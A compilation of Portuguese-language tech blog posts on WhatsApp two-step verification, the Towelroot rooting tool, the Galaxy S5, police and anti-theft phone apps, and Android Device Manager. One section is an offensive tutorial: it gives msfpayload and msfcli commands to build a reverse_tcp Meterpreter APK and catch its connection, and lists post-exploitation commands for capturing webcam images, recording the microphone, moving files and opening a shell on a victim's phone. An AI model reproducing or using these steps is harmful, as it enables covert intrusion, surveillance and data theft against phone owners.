Whatsapp agora permite duplo fator de autenticação

O WhatsApp introduziu um novo recurso de segurança que corrige uma brecha na popular plataforma de mensagens, que, se explorada, pode permitir que um invasor entre na conta da vítima apenas sabendo o número de telefone da vítima e algumas habilidades de hacking.
O ataque não explora qualquer vulnerabilidade no WhatsApp; Em vez disso, depende da maneira como o mecanismo de configuração da conta funciona.
O WhatsApp permite que os usuários se inscrevam no aplicativo usando seu número de telefone; portanto, se um invasor quiser seqüestrar sua conta do WhatsApp, eles precisarão de um OTP (one time password) para enviar para seu número de telefone.

O atacante pode pegar este OTP desviando o SMS contendo a senha para seu próprio computador ou telefone, usando um aplicativo mal-intencionado ou vulnerabilidade SS7  e, em seguida, faça o login na conta WhatsApp da vítima. O ataque também funciona se o telefone estiver bloqueado.
Em agosto, hackers patrocinados pelo governo iraniano teriam sequestrado dezenas de contas do Telegram pertencentes a ativistas e jornalistas, explorando uma brecha semelhante.
Tal ataque também poderia ser utilizado contra qualquer aplicação de mensagens, incluindo Whatsapp e Viber, cujo registo baseia-se no mecanismo de verificação baseado em SMS.

Portanto, para corrigir esse problema, o WhatsApp agora introduziu o recurso de senha de verificação em duas etapas (2AF) para sua versão beta para Android, o que ajudará a bloquear o mecanismo de configuração do WhatsApp.
Em outras palavras, para reconfigurar a conta do WhatsApp com a confirmação em duas etapas habilitada, é preciso exigir não apenas o OTP, mas também uma senha de 6 dígitos definida pelo usuário.

whatsapp-enable-two-factor

COMO HABILITAR:

Para habilitar, você precisa primeiramente ser um Beta tester do Whatsapp, para ser um beta tester vou dar uma explicação resumida: basta abrir o Google Play, ir no Whasttapp, rolar a página até me baixo, e vai ter um botão ACEITAR. Depois de ser beta tester, basta seguir os passos:

  1. Vá até WhatsApp Settings → Account → Two-step verification.
  2. Click enable, insira uma senha de 6 digitos e confirme.
  3. Na p´roxima tela, entre seu email ID (opcional) para habilitar a recuperação de chave por email. (Recomenda-se usar o e-mail como backup para que você não seja bloqueado da sua conta se você esquecer sua senha.)
  4. Clique em “Done, “e prontinho!.
Anúncios

Hacker cria app capaz de fazer root em quase todos os Androids

Houve um tempo em que o Android era fácil de ser “rootado”, mas essa não é mais uma realidade para qualquer aparelho. Pelo menos até agora, já que o hacket George Hotz, conhecido pelo apelido de “Geohot”, desenvolveu e lançou um método para destravar o Galaxy S5 das operadoras AT&T e Verizon, especialmente difíceis, mas que deve ser capaz de desbloquear qualquer aparelho.

A ferramenta se chama Towelroot e promete ser o jeito mais fácil de aplicar o root ao seu Android. Para isso, basta entrar neste site, baixar o APK e instalá-lo no celular. Em seguida, basta pressionar um único botão, que traz os dizeres “make it ra1n”. Após o término do processo, o aparelho deve estar “rootado”.

O hacker, que também é o mesmo que arrumou problemas com a Sony por rodar Linux no PlayStation 3 e também por ter criado uma ferramenta de jailbreak do iPhone em 2010, diz que o Towelroot deve funcionar com qualquer aparelho com Android 4.4.2 ou inferior, o que inclui todos os aparelhos recentes da Samsung, LG, e vários outros.

A ferramenta se baseia em uma vulnerabilidade no kernel do Linux já conhecida e corrigida nos desktops, mas que permanece no Android.

Vale observar que do ponto de vista do entusiasta do root, para ter mais liberdade na plataforma, a notícia é excelente. Do ponto de vista da segurança, nem tanto. Por ser tão simples de aplicar, o Towelroot pode ser distribuído com outros apps mal-intencionados. O root torna praticamente ilimitado o poder de um malware sobre o sistema, o que é algo realmente perigoso.

 

Site: http://towelroot.com/

Galaxy S5: Um smartphone poderoso resistente à poeira e água

galaxy_s5

A Samsung apresentou ontem, dia 24, o tão esperado Galaxy S5, que deixa de lado o design típico do S4 por algo mais clássico e discreto. A parte de trás tem uma textura com fundos que imita metal, mas é feita de plástico. Ao deixar de lado a enorme quantidade de novas funções do modelo anterior, o objetivo da Samsung parece claro: Criar um smartphone que possa fazer tudo o que os consumidores realmente precisam.

O novo topo de linha da Samsung conta com uma belíssima tela Super AMOLED de 5.1 polegadas com resolução de 1920 x 1080 pixels e densidade de 431 pontos por polegada (será que só eu acho esta tela grande demais?). O processador é um Snapdragon 800 quad-core de 2.5GHz e o smartphone também conta com 2GB de RAM. São dois modelos, com 16 ou 32GB de capacidade. Achou pouco? Não se preocupe, pois o S5 tem slot para cartões microSD de até 64GB.

A câmera traseira de 16 megapixels é capaz de gravar vídeos em 4K UHD (Ultra High Definition), algo bem interessante para os poucos privilegiados que têm uma TV 4K em casa. Ela também tem HDR e foco automático que é acionado em apenas 0,3 segundos, além da função “Foco Seletivo”, que permite que você destaque um ponto da foto e deixe o resto fora de foco. O S5 também tem uma câmera frontal de 2.1 megapixels.

O S5 é o primeiro smartphone com leitor de batimentos cardíacos do mercado, algo feito sob medida para a função S Health e seus recursos que procuram monitorar a saúde do usuário. O aparelho também conta com pedômetro e outros sensores, e funciona perfeitamente com os relógios Gear 2 e Gear Fit.

Assim como concorrente, o iPhone 5s, o Galaxy S5 conta com um leitor biométrico no botão home, facilitando a vida na hora de desbloquear o aparelho ou comprar aplicativos. Uma das novidades que eu mais gostei no Galaxy S5 é a proteção IP67, ou seja, ele é um smartphone à prova d’água e de poeira.

Pesando 145 gramas, o S5 tem uma bateria de 2800mAh que pode ser removida pelo usuário (assim como a do S4). Em termos de conectividade, o S5 também está muito bem servido, com 4G LTE, Wi-Fi 802.11ac, 2X2 MIMO e Bluetooth 4.0.

E aí, você gostou do novo topo de linha da Samsung? Eu gostei bastante, pena que ele vai custar caro por aqui.

Saiba mais sobre o Galaxy S5 no Samsung Mobile Express.

Clique abaixo para ver várias imagens do novo Galaxy S5.

Continuar lendo

App para checar se carro foi roubado

O Checkplaca, aplicativo para celular e computador lançado pelo Ministério da Justiça, alcançou mais de 400 mil downloads e tornou-se o mais baixado na loja da Apple no Brasil e o 14º lugar no mundo, conforme resultados divulgados pelo Governo.

Com o Checkplaca, o cidadão pode verificar se qualquer veículo é furtado ou roubado. Basta digitar a placa para o aplicativo informar o modelo, as características e situação do carro na base de dados do Departamento Nacional de Trânsito (Denatran) e do Sistema Nacional de Informações de Segurança Pública do Ministério da Justiça (Sinesp).

Quando o aplicativo detecta algo irregular, o sistema avisa e dá a opção de o usuário ligar, sem ter que se identificar, para a polícia, que manda uma equipe ao local para verificar a situação. O aplicativo também é utilizado pelas forças policiais. Gratuito, o programa está disponível para dispositivos como os sistemas operacionais IOS (Apple) e Android.

O Ministério da Justiça informou ainda que 50 veículos foram recuperados graças ao aplicativo, com média de um por dia. Mais de 5 milhões de consultas já foram feitas, com média de 150 mil diariamente. Em 2012, foram furtados 248.755 e roubados 203.844 veículos. Segundo o ministério, os números de 2013 ainda não estão fechados.

DOWNLOAD:

https://play.google.com/store/apps/details?id=br.gov.sinesp.cidadao.android&hl=pt_BR
https://itunes.apple.com/us/app/sinesp-cidadao/id768157962?ls=1&mt=8

Meterpreter + apk = Invadindo Android

O meterpreter em execução no  smartphone é uma das coisas que tava sentindo falta e o mínimo que eu podia fazer, era demonstrar uma prova de conceito.

O aplicativo para gerar o APK vai sr feito via msfpayload, com esta ferramenta podemos gerar shellcodes, tanto para linguagens como C, Javascript, Ruby, como gerar arquivos binários, que contêm o shellcode. O caso típico é o os cavalos de Tróia, ou como gerar um EXE com Meterpreter de shell inversa. Neste caso, vamos usar o aplicativo para gerar um msfpayload APK para o Android, que terá uma atividade principal um tanto curioso, é que realmente o que você executa é o Meterpreter Java modificado para ser executado em um Android. Usaremos o Msfcli para receber a conexão reversa gerado por shellcode que se executa no terminal.

Primeiro gerar o APK com a instrução msfpayload android/meterpreter/reverse_tcp LHOST=<IP donde esperaremos> LPORT=<puerto donde se debe conectar> R > meter.apk.

Uma vez gerado o nosso bug,  o que faremos é configurar para receber a conexão reversa via msfcli … esperar que o bug volte para casa. Para fazer isso, a ferramenta configurada assim:

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST= <IP QUE RECEBERÁ AS CONEXÕES>

piffa_apk

 

 

Uma vez que a vítima execute o APK se executará a shellcode que se encontra dentro do binario, provocando a conexão inversa. Recordamos que Meterpreter é do tipo Stager, assim será também em duas fases, primeiro de conexão e segundo de funcionalidades.

 

Nós já temos a sessão , o que podemos fazer com isso? Mais tarde, deixo uma lista de comandos disponíveis neste Meterpreter, principalmente as coisas que você poderia fazer com um Meterpreter Java. Bem, como lançar exemplo gráfico de uma captura de imagem através da câmera do próprio aparelho, usando o comando webcam_snap. Com webcam_list comando pode listar as câmeras de dispositivo disponíveis (frente, traseira). Um exemplo de captura de imagem da câmera na parte frontal do smartphone rodando o shellcode:

Temos também disponível comandos para download e upload de arquivos para o dispositivo, além de um shell como você pode ver na imagem:

Comandos do Meterpreter de Android:

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Android Device Manager – Encontrando seu Android

Android Device Manager é um serviço oficial da Google para ajudar quem perdeu o seu dispositivo com Android a encontrá-lo.

A ferramenta funciona a partir da web, ou seja, você não precisa realizar qualquer instalação nem no PC, nem no portátil (tablet ou smartphone).

Tudo o que precisa ser feito é a definição de algumas configurações antes de colocar o serviço em vigor. Assim, você acessa uma página na web e pode encontrar todos os aparelhos que estão vinculados à sua conta da Google. Ainda é possível fazer algumas ações remotas, como apagar dados do aplicativo.

Se você o perdeu dentro do seu quarto e não tem como ligar para ouvir o aparelho tocando, o Android Device Manager também permite que você “ligue” para o aparelho por meio do computador. Enfim, uma ferramenta que pode ajudar a quem não sabe onde seu dispositivo Android foi parar.

Android Device Manager

Configurando o Android Device Manager

Antes de tudo, você mexe no seu dispositivo Android. De modo geral, independente da versão do sistema (este serviço funciona a partir do Android 2.2), deve acessar as configurações e, no menu de localização e segurança, ativar a localização de serviços da Google e o GPS. Feito isso, basta acessar a página do serviço com sua conta da Google no navegador, a mesma utilizada no portátil.

Quando você entra no site do Android Device Manager, pode escolher o aparelho que quer localizar — caso você tenha mais de um vinculado à sua conta, obviamente. Quando seu aparelho é localizado, a posição dele aparece no mapa no fundo da tela.

Android Device Manager

Além disso, é possível enviar uma notificação ao dispositivo para realizar configurações avançadas. Com isso, você define duas funções: a de permitir que o aparelho seja localizado e também que seu conteúdo seja destruído remotamente.

Assim, é possível apagar tudo o que há no aparelho, garantindo a sua privacidade e segurança em caso de roubo ou perda irrecuperável do dispositivo Android.

Eu testei aqui e funcionou perfeito, bem bacana o sistema de manda o aparelho tocar.

Tire foto de quem roubar seu smartphone

iGotYa ou Gotya é um aplicativo que pega bisbilhoteiro de iPhone e Android alheio, pois ele tira uma foto com a câmera frontal do aparelho sempre que alguém tentar acessar o seu iPhone/Android e errar a senha de bloqueio.

O sistema envia a imagem do bisbilhoteiro junto com a localização GPSpara o endereço de e-mail do proprietário do iPhone/Android. Obviamente que o GotYa precisa de conexão Wi-Fi ou 3G para enviar esta informação.

iGotYa só é compatível com o iPhone desbloqueado e está disponível na loja de aplicativos alternativos Cydia Storepor US$6.Quem quiser pode testar, consegue de graça durante 10 dias e com algumas limitações.

Para Android, o Gotya custa R$5,99 – https://play.google.com/store/apps/details?id=com.myboyfriendisageek.gotya&hl=pt_BR